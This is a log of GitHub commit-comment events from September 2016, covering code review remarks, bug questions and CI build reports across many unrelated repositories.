{"id":"4607398011","type":"CommitCommentEvent","actor":{"login":"MarcusTwist"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19143120,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-23T09:05:41Z","updated_at":"2016-09-23T09:05:41Z","body":"Same for me, compiled and installed both but nothing changes with glyphs (iPhone 5, iOS 8.3)"}},"created_at":"2016-09-23T09:05:41Z"}
{"id":"4607400766","type":"CommitCommentEvent","actor":{"login":"harunurhan"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":19143128,"position":null,"line":null,"path":null,"commit_id":"746d2e97ee7e33720a6d63264d43c1c2e10e869d","created_at":"2016-09-23T09:06:15Z","updated_at":"2016-09-23T09:06:15Z","body":"will do"}},"created_at":"2016-09-23T09:06:15Z"}
{"id":"4607404906","type":"CommitCommentEvent","actor":{"login":"facelessloser"},"repo":{"name":"jwnace/nespad"},"payload":{"comment":{"id":19143142,"position":null,"line":null,"path":null,"commit_id":"3d18c789f6ae3af09fd9ee85a974ece90a0cac84","created_at":"2016-09-23T09:07:10Z","updated_at":"2016-09-23T09:07:10Z","body":"Changed made to SNESpad.cpp \r\n\r\nChanged #include \"WProgram.h\" to #include \"Arduino.h\""}},"created_at":"2016-09-23T09:07:10Z"}
{"id":"4607407127","type":"CommitCommentEvent","actor":{"login":"hudak52"},"repo":{"name":"mskrip/test_repo"},"payload":{"comment":{"id":19143145,"position":null,"line":null,"path":null,"commit_id":"cb7a2a24ba25ae6273f9cf62270657f2da4ba1a6","created_at":"2016-09-23T09:07:38Z","updated_at":"2016-09-23T09:07:38Z","body":"sele zle"}},"created_at":"2016-09-23T09:07:38Z"}
{"id":"4607409813","type":"CommitCommentEvent","actor":{"login":"saisona"},"repo":{"name":"Rand-IA/Reser-V"},"payload":{"comment":{"id":19143153,"position":385,"line":385,"path":"res/css/sheet.css","commit_id":"77acccd307a95fd22bac6895ba2ca8d3cfd2b954","created_at":"2016-09-23T09:08:11Z","updated_at":"2016-09-23T09:08:11Z","body":"lhgkhg"}},"created_at":"2016-09-23T09:08:11Z"}
{"id":"4607410879","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19143155,"position":null,"line":null,"path":null,"commit_id":"4d6d84015167863c04b205d12c16720ca1e00a89","created_at":"2016-09-23T09:08:25Z","updated_at":"2016-09-23T09:08:25Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1134](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14052&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:09:28"}},"created_at":"2016-09-23T09:08:25Z"}
{"id":"4607432479","type":"CommitCommentEvent","actor":{"login":"aslam558"},"repo":{"name":"posabsolute/jQuery-Validation-Engine"},"payload":{"comment":{"id":19143212,"position":null,"line":null,"path":null,"commit_id":"863793cb3697d3778554ab415e38e38374ce7cb3","created_at":"2016-09-23T09:13:02Z","updated_at":"2016-09-23T09:13:02Z","body":"\r\nI have a query on \"Jquery Validation Engine\".\r\n\r\nwhen i click on submit button without entering in the fields, i get an error messages.\r\n\r\nat such senario when i go to particular field and start typing it should validate there itself and error message should get hidden.\r\n\r\nCan you please help me at this issue.\r\n\r\nThanks in Advance"}},"created_at":"2016-09-23T09:13:02Z"}
{"id":"4607433572","type":"CommitCommentEvent","actor":{"login":"kdarbyshirebryant"},"repo":{"name":"tegularius/sch_cake"},"payload":{"comment":{"id":19143214,"position":null,"line":null,"path":null,"commit_id":"2f3c308faec499069959b4489e5a724a7d3b82f3","created_at":"2016-09-23T09:13:16Z","updated_at":"2016-09-23T09:13:16Z","body":"I hacked this together which appears to work for my 'dual-dsthost dstnat' use case for an ingress IFB, and also 'dual-srchost srcnat' for the egress interface."}},"created_at":"2016-09-23T09:13:16Z"}
{"id":"4607436675","type":"CommitCommentEvent","actor":{"login":"lyhcode"},"repo":{"name":"trunk-studio/cargocms"},"payload":{"comment":{"id":19143303,"position":17,"line":31,"path":"views-labfnp/wall/index.ejs","commit_id":"34aab78266060d975aaa41b0a988c731863240ba","created_at":"2016-09-23T09:13:55Z","updated_at":"2016-09-23T09:13:55Z","body":"linkify 在 EJS 的使用方法請大家參考"}},"created_at":"2016-09-23T09:13:55Z"}
{"id":"4607437592","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":19143345,"position":6,"line":459,"path":"lib/util.sh","commit_id":"5b780579b6bacb6d1faa407eb32819eece53446b","created_at":"2016-09-23T09:14:06Z","updated_at":"2016-09-23T09:14:06Z","body":"The approach is not built around freaking WMs, and I told you, that I will not further build around individual stuff, I won't..\r\nI hear all the time, we need to discuss this and that, now I ask to please discuss a solution, several topics on that exist already what apparently no discussion at all. This is crazy guys."}},"created_at":"2016-09-23T09:14:06Z"}
{"id":"4607438608","type":"CommitCommentEvent","actor":{"login":"vaikhan2"},"repo":{"name":"GoogleCloudPlatform/DataflowJavaSDK"},"payload":{"comment":{"id":19143348,"position":53,"line":285,"path":"sdk/src/main/java/com/google/cloud/dataflow/sdk/util/BigQueryTableInserter.java","commit_id":"94d57207924ed8650cf3c97fccb2a45f27bcc6a3","created_at":"2016-09-23T09:14:19Z","updated_at":"2016-09-23T09:14:19Z","body":"Yes, nextBackoffMillis should also be used directly at L287.\r\n\r\nI checked the Beam version and I agree that the check is correct in it, the issue is only in the Dataflow version."}},"created_at":"2016-09-23T09:14:19Z"}
{"id":"4607439885","type":"CommitCommentEvent","actor":{"login":"phueper"},"repo":{"name":"js-joda/js-joda"},"payload":{"comment":{"id":19143352,"position":null,"line":null,"path":null,"commit_id":"2284c3f011d9e086b02b974d07f7e5052185465f","created_at":"2016-09-23T09:14:37Z","updated_at":"2016-09-23T09:14:37Z","body":":+1:\r\n"}},"created_at":"2016-09-23T09:14:37Z"}
{"id":"4607440672","type":"CommitCommentEvent","actor":{"login":"kevzlou7979"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19143355,"position":59,"line":692,"path":"gwt-material/src/main/java/gwt/material/design/client/ui/MaterialListValueBox.java","commit_id":"0152ed117c66049e9dd4c41191e298e7228a7765","created_at":"2016-09-23T09:14:48Z","updated_at":"2016-09-23T09:14:48Z","body":"Corrected"}},"created_at":"2016-09-23T09:14:48Z"}
{"id":"4607440835","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19143358,"position":null,"line":null,"path":null,"commit_id":"153a5ff66a1625e8f1e66a19d99af2a0ca7afebc","created_at":"2016-09-23T09:14:51Z","updated_at":"2016-09-23T09:14:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1135](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14062&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T09:14:51Z"}
{"id":"4607441124","type":"CommitCommentEvent","actor":{"login":"CedricYii"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19143359,"position":1,"line":1,"path":"docs/guide-fr/db-active-record.md","commit_id":"181e66b8601c70d55177c7d4f0be8599dc63bfc2","created_at":"2016-09-23T09:14:53Z","updated_at":"2016-09-23T09:14:53Z","body":"Because Yii core code itself is not translated, you can't write:\r\n` class Customer extends EnregistrementActif... `\r\n\r\nSo the main title and references in the text should keep the real class name in it (and maybe a translation in parenthesis) like so:\r\n`Active Record (*Enregistrement Actif*)`\r\n\r\nOtherwise you are making things harder to follow, especially when you are trying to learn how to use the framework (which is mostly the case when reading a guide)."}},"created_at":"2016-09-23T09:14:53Z"}
{"id":"4607441162","type":"CommitCommentEvent","actor":{"login":"kevzlou7979"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19143360,"position":51,"line":619,"path":"gwt-material/src/main/java/gwt/material/design/client/ui/MaterialValueBox.java","commit_id":"0152ed117c66049e9dd4c41191e298e7228a7765","created_at":"2016-09-23T09:14:54Z","updated_at":"2016-09-23T09:14:54Z","body":"Corrected\r\n"}},"created_at":"2016-09-23T09:14:54Z"}
{"id":"4607441650","type":"CommitCommentEvent","actor":{"login":"kevzlou7979"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19143362,"position":63,"line":630,"path":"gwt-material/src/main/java/gwt/material/design/client/ui/MaterialValueBox.java","commit_id":"0152ed117c66049e9dd4c41191e298e7228a7765","created_at":"2016-09-23T09:15:01Z","updated_at":"2016-09-23T09:15:01Z","body":"Corrected"}},"created_at":"2016-09-23T09:15:01Z"}
{"id":"4607442580","type":"CommitCommentEvent","actor":{"login":"12AngryMen"},"repo":{"name":"votca/xtp"},"payload":{"comment":{"id":19143365,"position":null,"line":null,"path":null,"commit_id":"72f37f866487f975aeacfa6998377900aac50e5c","created_at":"2016-09-23T09:15:13Z","updated_at":"2016-09-23T09:15:13Z","body":"yes"}},"created_at":"2016-09-23T09:15:13Z"}
{"id":"4607442835","type":"CommitCommentEvent","actor":{"login":"maxwelltsai"},"repo":{"name":"maxwelltsai/SiMon"},"payload":{"comment":{"id":19143367,"position":33,"line":57,"path":"run_manager2.py","commit_id":"307a77e1efbcbbbd78977716ec0a8c65dbc80e18","created_at":"2016-09-23T09:15:16Z","updated_at":"2016-09-23T09:15:16Z","body":"@PennyQ That's correct. It is a recursive method, but the only purpose (so far) is just to print the instance structure in the terminal. I will modify the comments to make it more clear."}},"created_at":"2016-09-23T09:15:16Z"}
{"id":"4607445754","type":"CommitCommentEvent","actor":{"login":"Cuiweihua"},"repo":{"name":"Cuiweihua/BigDataSystemDesign"},"payload":{"comment":{"id":19143382,"position":null,"line":null,"path":null,"commit_id":"4728dfe7e659221bec628fa71f71d154cfac6e67","created_at":"2016-09-23T09:15:53Z","updated_at":"2016-09-23T09:15:53Z","body":"how to use github"}},"created_at":"2016-09-23T09:15:53Z"}
{"id":"4607446056","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19143383,"position":null,"line":null,"path":null,"commit_id":"7272223930c7cb67ea9d92d6c85b6752e7f62594","created_at":"2016-09-23T09:15:58Z","updated_at":"2016-09-23T09:15:58Z","body":"Note on comments instead of using `<!-- text -->` you can use  [//]: # (text).\r\n\r\ni.e.\r\n``` [//]: # (FIND THE CLASS NAME:  Right click on top of the element to open the context menu, and choose \"Inspect\". This will open the developer tools panel. A screenshot of both the unstyled element, and the development tools panel showing the element and the styles/rule frame on the right would be the easiest to provide.)```"}},"created_at":"2016-09-23T09:15:58Z"}
{"id":"4607447465","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19143386,"position":null,"line":null,"path":null,"commit_id":"0e336449ec99d7ca6fe48b15862994a7901976fc","created_at":"2016-09-23T09:16:17Z","updated_at":"2016-09-23T09:16:17Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1136](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14068&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T09:16:17Z"}
{"id":"4607448100","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19143388,"position":null,"line":null,"path":null,"commit_id":"0eb8b92064db014100d6ed2b618c8cf635b37c26","created_at":"2016-09-23T09:16:25Z","updated_at":"2016-09-23T09:16:25Z","body":"@snicolet Well, point 1 is more tricky than thought: \r\nin min_attacker() we haven't access to this (pos) nor we know the color to perform fromb = pieces(color, KING);\r\n"}},"created_at":"2016-09-23T09:16:25Z"}
{"id":"4607448622","type":"CommitCommentEvent","actor":{"login":"ygcgithub"},"repo":{"name":"ygcgithub/trytwo"},"payload":{"comment":{"id":19143390,"position":null,"line":null,"path":null,"commit_id":"995a893895a8a79cf0ad40929134642a17288bf2","created_at":"2016-09-23T09:16:33Z","updated_at":"2016-09-23T09:16:33Z","body":"第一次提交\r\n"}},"created_at":"2016-09-23T09:16:33Z"}
{"id":"4607449478","type":"CommitCommentEvent","actor":{"login":"ygcgithub"},"repo":{"name":"ygcgithub/trytwo"},"payload":{"comment":{"id":19143391,"position":null,"line":null,"path":null,"commit_id":"995a893895a8a79cf0ad40929134642a17288bf2","created_at":"2016-09-23T09:16:43Z","updated_at":"2016-09-23T09:16:43Z","body":"第一次提交"}},"created_at":"2016-09-23T09:16:43Z"}
{"id":"4607451525","type":"CommitCommentEvent","actor":{"login":"sachinpunadikar"},"repo":{"name":"ganltc/nfs-ganesha"},"payload":{"comment":{"id":19143396,"position":null,"line":null,"path":null,"commit_id":"b895fedfd0bc1dd229acac75ff264dd8b4ced7ac","created_at":"2016-09-23T09:17:10Z","updated_at":"2016-09-23T09:17:10Z","body":"Tested the code. It works fine. Porting this to ifs1.6 branch"}},"created_at":"2016-09-23T09:17:10Z"}
{"id":"4607451849","type":"CommitCommentEvent","actor":{"login":"carlesRT"},"repo":{"name":"EnEff-BIM/EnEffBIM-Framework"},"payload":{"comment":{"id":19143398,"position":null,"line":null,"path":null,"commit_id":"5fdb06a82914efc0e3c1bf5dc38663fd72c39c64","created_at":"2016-09-23T09:17:14Z","updated_at":"2016-09-23T09:17:14Z","body":"#95 "}},"created_at":"2016-09-23T09:17:14Z"}
{"id":"4607457486","type":"CommitCommentEvent","actor":{"login":"gundalow"},"repo":{"name":"privateip/ansible"},"payload":{"comment":{"id":19143410,"position":11,"line":145,"path":"lib/ansible/module_utils/shell.py","commit_id":"cb25b1884e518ebd1459b214cfa737044dc7b9db","created_at":"2016-09-23T09:18:31Z","updated_at":"2016-09-23T09:18:31Z","body":"Magic numbers. Might be worth putting these in a sensibly named variable"}},"created_at":"2016-09-23T09:18:31Z"}
{"id":"4607459143","type":"CommitCommentEvent","actor":{"login":"no372"},"repo":{"name":"no372/bme-vik-info"},"payload":{"comment":{"id":19143412,"position":6,"line":22,"path":".gitattributes","commit_id":"c5c6afb99b823ca6b4812e9b124746639f42691f","created_at":"2016-09-23T09:18:54Z","updated_at":"2016-09-23T09:18:54Z","body":"Java source file"}},"created_at":"2016-09-23T09:18:54Z"}
{"id":"4607461619","type":"CommitCommentEvent","actor":{"login":"mihkels"},"repo":{"name":"open-eid/SiVa"},"payload":{"comment":{"id":19143421,"position":24,"line":41,"path":"validation-services-parent/bdoc-validation-service/src/main/java/ee/openeid/validation/service/bdoc/signature/policy/BDOCConfigurationService.java","commit_id":"f7157d7316e9d808118e503ba1c8f236a338d576","created_at":"2016-09-23T09:19:27Z","updated_at":"2016-09-23T09:19:27Z","body":"Can be private method"}},"created_at":"2016-09-23T09:19:27Z"}
{"id":"4607469204","type":"CommitCommentEvent","actor":{"login":"winwu"},"repo":{"name":"Joannie/wwcodehomework"},"payload":{"comment":{"id":19143435,"position":8,"line":8,"path":"homework-1.html","commit_id":"bbb43700a233480078be3432be519662c0abcc52","created_at":"2016-09-23T09:21:05Z","updated_at":"2016-09-23T09:21:05Z","body":"建議 `<h4>` 只放單純的文字或是 圖片+文字  內容盡量 focus 在表達一句標題\r\n在這個案例中 可以把 `<h4>` 改為單純的 `<div>` 就行了 :)\r\n"}},"created_at":"2016-09-23T09:21:05Z"}
{"id":"4607470692","type":"CommitCommentEvent","actor":{"login":"paroxp"},"repo":{"name":"alphagov/paas-cf"},"payload":{"comment":{"id":19143438,"position":null,"line":null,"path":null,"commit_id":"8ced8d0fe0a8cb9b7f474f7fdf2b20e3fd43d2ac","created_at":"2016-09-23T09:21:25Z","updated_at":"2016-09-23T09:21:25Z","body":"**Please note:** This may not be the correct way to do this. We may want/need to rethink this change.\r\n\r\n/cc @combor "}},"created_at":"2016-09-23T09:21:25Z"}
{"id":"4607470945","type":"CommitCommentEvent","actor":{"login":"winwu"},"repo":{"name":"Joannie/wwcodehomework"},"payload":{"comment":{"id":19143439,"position":2,"line":2,"path":"homework-2.html","commit_id":"bbb43700a233480078be3432be519662c0abcc52","created_at":"2016-09-23T09:21:28Z","updated_at":"2016-09-23T09:21:28Z","body":"多了一行 <html lang=\"en\"> 哦 !"}},"created_at":"2016-09-23T09:21:28Z"}
{"id":"4607471794","type":"CommitCommentEvent","actor":{"login":"gerritbruening"},"repo":{"name":"faustedition/faust-web"},"payload":{"comment":{"id":19143441,"position":null,"line":null,"path":null,"commit_id":"70a0f21d6c07df16d749b3664fd52d46737da6a5","created_at":"2016-09-23T09:21:39Z","updated_at":"2016-09-23T09:21:39Z","body":"According to http://beinecke.library.yale.edu/research/permissions-copyright"}},"created_at":"2016-09-23T09:21:39Z"}
{"id":"4607474753","type":"CommitCommentEvent","actor":{"login":"winwu"},"repo":{"name":"Joannie/wwcodehomework"},"payload":{"comment":{"id":19143447,"position":20,"line":20,"path":"homework-2.html","commit_id":"bbb43700a233480078be3432be519662c0abcc52","created_at":"2016-09-23T09:22:17Z","updated_at":"2016-09-23T09:22:17Z","body":"可以的話盡量在縮排一層\r\n```\r\n<ul>\r\n     <li></li>\r\n     <li></li>\r\n</ul>\r\n```"}},"created_at":"2016-09-23T09:22:17Z"}
{"id":"4607477275","type":"CommitCommentEvent","actor":{"login":"esorio"},"repo":{"name":"cstefanache/angular2-img-cropper"},"payload":{"comment":{"id":19143452,"position":null,"line":null,"path":null,"commit_id":"d9d33299b90c74c55d051eecfe52ef8d240c0c82","created_at":"2016-09-23T09:22:50Z","updated_at":"2016-09-23T09:22:50Z","body":"You are right, the upgrade to angular2 of the ng2-styler package is alse needed (I'm working on it).\r\nWhich are the things exported in index.ts that are no longer needed?"}},"created_at":"2016-09-23T09:22:50Z"}
{"id":"4607479513","type":"CommitCommentEvent","actor":{"login":"winwu"},"repo":{"name":"Joannie/wwcodehomework"},"payload":{"comment":{"id":19143458,"position":null,"line":null,"path":null,"commit_id":"bbb43700a233480078be3432be519662c0abcc52","created_at":"2016-09-23T09:23:19Z","updated_at":"2016-09-23T09:23:19Z","body":"整體上還不錯，縮排可以多練習跟習慣，盡量習慣排出好看的 HTML 👍 "}},"created_at":"2016-09-23T09:23:19Z"}
{"id":"4607482446","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19143461,"position":null,"line":null,"path":null,"commit_id":"153a5ff66a1625e8f1e66a19d99af2a0ca7afebc","created_at":"2016-09-23T09:23:55Z","updated_at":"2016-09-23T09:23:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1135](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14062&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:09:04"}},"created_at":"2016-09-23T09:23:55Z"}
{"id":"4607484856","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19143466,"position":null,"line":null,"path":null,"commit_id":"4d8e3d89f1c52b27dabd619a32f21e8b6e28e971","created_at":"2016-09-23T09:24:24Z","updated_at":"2016-09-23T09:24:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1137](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14072&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T09:24:24Z"}
{"id":"4607486264","type":"CommitCommentEvent","actor":{"login":"Patater"},"repo":{"name":"ARMmbed/uvisor"},"payload":{"comment":{"id":19143470,"position":null,"line":null,"path":null,"commit_id":"06622510c07d186de3d404c68e316ec80e4c8770","created_at":"2016-09-23T09:24:41Z","updated_at":"2016-09-23T09:24:41Z","body":"@sherrellbc\r\n\r\n[Here is the documentation we have so far](https://github.com/ARMmbed/uvisor/blob/master/docs/api/manual/UseCases.md#remote-procedure-calls). The QuickStart guide section is still \"coming soon\".\r\n\r\n"}},"created_at":"2016-09-23T09:24:41Z"}
{"id":"4607487243","type":"CommitCommentEvent","actor":{"login":"KingsDevelopment"},"repo":{"name":"cstefanache/angular2-img-cropper"},"payload":{"comment":{"id":19143473,"position":null,"line":null,"path":null,"commit_id":"d9d33299b90c74c55d051eecfe52ef8d240c0c82","created_at":"2016-09-23T09:24:53Z","updated_at":"2016-09-23T09:24:53Z","body":"Already creating working pull request."}},"created_at":"2016-09-23T09:24:53Z"}
{"id":"4607487861","type":"CommitCommentEvent","actor":{"login":"thinca"},"repo":{"name":"railsconfig/config"},"payload":{"comment":{"id":19143474,"position":null,"line":null,"path":null,"commit_id":"eb405d70fe69634a22fe44340117261ecbb989d0","created_at":"2016-09-23T09:25:00Z","updated_at":"2016-09-23T09:25:00Z","body":"👍 "}},"created_at":"2016-09-23T09:25:00Z"}
{"id":"4607492369","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19143489,"position":null,"line":null,"path":null,"commit_id":"0eb8b92064db014100d6ed2b618c8cf635b37c26","created_at":"2016-09-23T09:25:57Z","updated_at":"2016-09-23T09:25:57Z","body":"@snicolet However bench doesn't change whether we initialize fromb or not.\r\nI believe the reason is that, if nextVictim is King and there are still attackers, then the move will be discarded anyway by line 1045 (master).\r\nMy unique problem is now how to avoid the resulting 'may be used uninitialized' warning.\r\nInitializing fromb=0 is also feasible but I imagine somewhat slower."}},"created_at":"2016-09-23T09:25:57Z"}
{"id":"4607492373","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19143490,"position":null,"line":null,"path":null,"commit_id":"0e336449ec99d7ca6fe48b15862994a7901976fc","created_at":"2016-09-23T09:25:57Z","updated_at":"2016-09-23T09:25:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1136](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14068&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 222, ignored: 3 Build time: 00:09:40\n### Failed tests\n```\norg.genivi.sota.core.DeviceUpdatesResourceSpec.Requests for device that does not exist in namespace should return 403 Forbidden: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-23T09:25:57Z"}
{"id":"4607492777","type":"CommitCommentEvent","actor":{"login":"zhuravel"},"repo":{"name":"talkable/talkable-ruby"},"payload":{"comment":{"id":19143493,"position":71,"line":135,"path":"README.md","commit_id":"28e4c52170b0d7f2d98e2b292ed99921a0623f41","created_at":"2016-09-23T09:26:03Z","updated_at":"2016-09-23T09:26:03Z","body":"`<%==` → `<%=`"}},"created_at":"2016-09-23T09:26:03Z"}
{"id":"4607493374","type":"CommitCommentEvent","actor":{"login":"coolboy-ccp"},"repo":{"name":"coolboy-ccp/CCPStudy"},"payload":{"comment":{"id":19143494,"position":2,"line":2,"path":"README.md","commit_id":"57992c853401038351bdb6320ace9e419f43fa73","created_at":"2016-09-23T09:26:11Z","updated_at":"2016-09-23T09:26:11Z","body":"人文氛围"}},"created_at":"2016-09-23T09:26:11Z"}
{"id":"4607495327","type":"CommitCommentEvent","actor":{"login":"sggua"},"repo":{"name":"sggua/goit"},"payload":{"comment":{"id":19143498,"position":25,"line":51,"path":"JavaCoreGoIt/src/module06/homework/ArrayUtils.java","commit_id":"1ef1ae1e27cb939abb1b1aab64c14f2fc213ec72","created_at":"2016-09-23T09:26:36Z","updated_at":"2016-09-23T09:26:36Z","body":"согласен"}},"created_at":"2016-09-23T09:26:36Z"}
{"id":"4607496238","type":"CommitCommentEvent","actor":{"login":"jigla"},"repo":{"name":"jigla/simple-framebuffer-image-viewer"},"payload":{"comment":{"id":19143502,"position":null,"line":null,"path":null,"commit_id":"d5e1c1ea8a065e288c3e249bac2bb328d5326048","created_at":"2016-09-23T09:26:47Z","updated_at":"2016-09-23T09:26:47Z","body":"Found very useful for my project...Thank You RamPrasad."}},"created_at":"2016-09-23T09:26:47Z"}
{"id":"4607497231","type":"CommitCommentEvent","actor":{"login":"hsnks100"},"repo":{"name":"hsnks100/wed07"},"payload":{"comment":{"id":19143506,"position":null,"line":null,"path":null,"commit_id":"8c4b210df2d3a1c834ad386cff5a6a2728d63ff7","created_at":"2016-09-23T09:27:01Z","updated_at":"2016-09-23T09:27:01Z","body":"댓글도 가능하네요."}},"created_at":"2016-09-23T09:27:01Z"}
{"id":"4607498839","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19143509,"position":null,"line":null,"path":null,"commit_id":"6c5740011c2b1169c869e6f77f36b5ae26534098","created_at":"2016-09-23T09:27:21Z","updated_at":"2016-09-23T09:27:21Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: Tests Failed (2208 of 2495 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c5740011c2b1169c869e6f77f36b5ae26534098-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c5740011c2b1169c869e6f77f36b5ae26534098-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.5%25-red.svg)</a> \n"}},"created_at":"2016-09-23T09:27:21Z"}
{"id":"4607498859","type":"CommitCommentEvent","actor":{"login":"vitalikdanchenko"},"repo":{"name":"talkable/talkable-ruby"},"payload":{"comment":{"id":19143510,"position":71,"line":135,"path":"README.md","commit_id":"28e4c52170b0d7f2d98e2b292ed99921a0623f41","created_at":"2016-09-23T09:27:21Z","updated_at":"2016-09-23T09:27:21Z","body":"`advocate_share_iframe` returns string that contains html"}},"created_at":"2016-09-23T09:27:21Z"}
{"id":"4607501537","type":"CommitCommentEvent","actor":{"login":"boutros"},"repo":{"name":"boutros/koha-return-receipt-bookmarklet"},"payload":{"comment":{"id":19143522,"position":null,"line":null,"path":null,"commit_id":"d3a0637051d983480f023f6e5a37b46df2c48e2b","created_at":"2016-09-23T09:27:56Z","updated_at":"2016-09-23T09:27:56Z","body":"hvem har lånt PCen min?"}},"created_at":"2016-09-23T09:27:56Z"}
{"id":"4607501655","type":"CommitCommentEvent","actor":{"login":"coolboy-ccp"},"repo":{"name":"coolboy-ccp/CCPStudy"},"payload":{"comment":{"id":19143523,"position":null,"line":null,"path":null,"commit_id":"57992c853401038351bdb6320ace9e419f43fa73","created_at":"2016-09-23T09:27:58Z","updated_at":"2016-09-23T09:27:58Z","body":"这只是我个人学习笔记，仅限新手交流，不合理的地方麻烦各位指正下，一起学习，共同进步。"}},"created_at":"2016-09-23T09:27:58Z"}
{"id":"4607503202","type":"CommitCommentEvent","actor":{"login":"jlecoeur"},"repo":{"name":"lis-epfl/MAVRIC_Library"},"payload":{"comment":{"id":19143526,"position":11,"line":267,"path":"communication/mavlink_waypoint_handler.hpp","commit_id":"65811c57db0de3fcd0cf074cdf93ab24c708ac53","created_at":"2016-09-23T09:28:17Z","updated_at":"2016-09-23T09:28:17Z","body":"Do we need this now that there is a home waypoint?"}},"created_at":"2016-09-23T09:28:17Z"}
{"id":"4607503217","type":"CommitCommentEvent","actor":{"login":"jigla"},"repo":{"name":"jigla/simple-framebuffer-image-viewer"},"payload":{"comment":{"id":19143527,"position":null,"line":null,"path":null,"commit_id":"d5e1c1ea8a065e288c3e249bac2bb328d5326048","created_at":"2016-09-23T09:28:17Z","updated_at":"2016-09-23T09:28:17Z","body":"We still can make much changes, Hope we will take it to next level i.e showing animation images like GIF."}},"created_at":"2016-09-23T09:28:17Z"}
{"id":"4607504637","type":"CommitCommentEvent","actor":{"login":"ArseniyShestakov"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":19143533,"position":19,"line":175,"path":"lib/mapObjects/CRewardableObject.cpp","commit_id":"bb05db90e53183bd67524ca54d5c317e1f5aa4fb","created_at":"2016-09-23T09:28:35Z","updated_at":"2016-09-23T09:28:35Z","body":"@viciious we'll be happy to accept pull request that will get rid of them!\r\nThough don't touch fuzzylite please."}},"created_at":"2016-09-23T09:28:35Z"}
{"id":"4607505256","type":"CommitCommentEvent","actor":{"login":"midenok"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":19143534,"position":null,"line":null,"path":null,"commit_id":"d177e9cd67cc01e28f13310b09a4e72af861cf79","created_at":"2016-09-23T09:28:44Z","updated_at":"2016-09-23T09:28:44Z","body":"It's function's contract that it executes in context of versioning. No need to put additional business logic about it."}},"created_at":"2016-09-23T09:28:44Z"}
{"id":"4607510116","type":"CommitCommentEvent","actor":{"login":"AEnterprise"},"repo":{"name":"BuildCraft/BuildCraft"},"payload":{"comment":{"id":19143541,"position":9,"line":96,"path":"common/buildcraft/factory/block/BlockTank.java","commit_id":"b9f6f7311977c74611a87f1c0739a5dc7c0de0fb","created_at":"2016-09-23T09:29:47Z","updated_at":"2016-09-23T09:29:47Z","body":"it will work around it but that needs to be called in teh forge fluidutil code to fix it for all other mods that use this and don't know/understand what's heapening"}},"created_at":"2016-09-23T09:29:47Z"}
